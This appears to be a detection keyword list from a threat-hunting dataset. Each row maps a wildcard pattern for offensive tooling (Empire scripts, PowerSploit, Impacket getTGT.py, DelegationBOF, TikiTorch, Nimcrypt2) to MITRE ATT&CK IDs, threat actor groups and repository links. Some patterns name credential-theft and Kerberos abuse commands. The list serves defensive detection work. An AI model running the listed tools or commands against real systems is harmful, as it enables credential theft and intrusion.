-*Get-SecurityPackages.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Vnc.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-ShadowCopies*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*GetShellcode(*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z
-*Get-SitelistFields*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-SiteListPassword*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Get-SiteListPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-SiteListPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-SiteListPassword*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*getsploit*,offensive_tool_keyword,getsploit,Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.,T1583 - T1584 - T1586,TA0007,N/A,N/A,Exploitation tools,https://github.com/vulnersCom/getsploit,1,0,N/A,N/A,10,1667,255,2023-03-27T15:18:55Z,2017-06-04T09:31:44Z
-*Get-SPN.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*get-spns All*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z
-*get-spns ASREP*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z
-*get-spns spns*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z
-*Get-SQLInstanceDomain*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-SQLInstanceDomain.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-SQLInstanceDomain.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-SqlServerLinkCrawl*,offensive_tool_keyword,AD exploitation cheat sheet,Automatically find all linked databases,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Get-SQLServerLoginDefaultPw*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SQLServerLoginDefaultPw.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-SQLServerLoginDefaultPw*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-SQLSysadminCheck*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SQLServerLoginDefaultPw.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*getST.py -k -no-pass -spn*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*GetSyscallStub.nim*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,1,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z
-*Get-System.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-SystemDNSServer.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SystemDNSServer.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-SystemNamedPipe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*getTGT.py -dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*getTGT.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
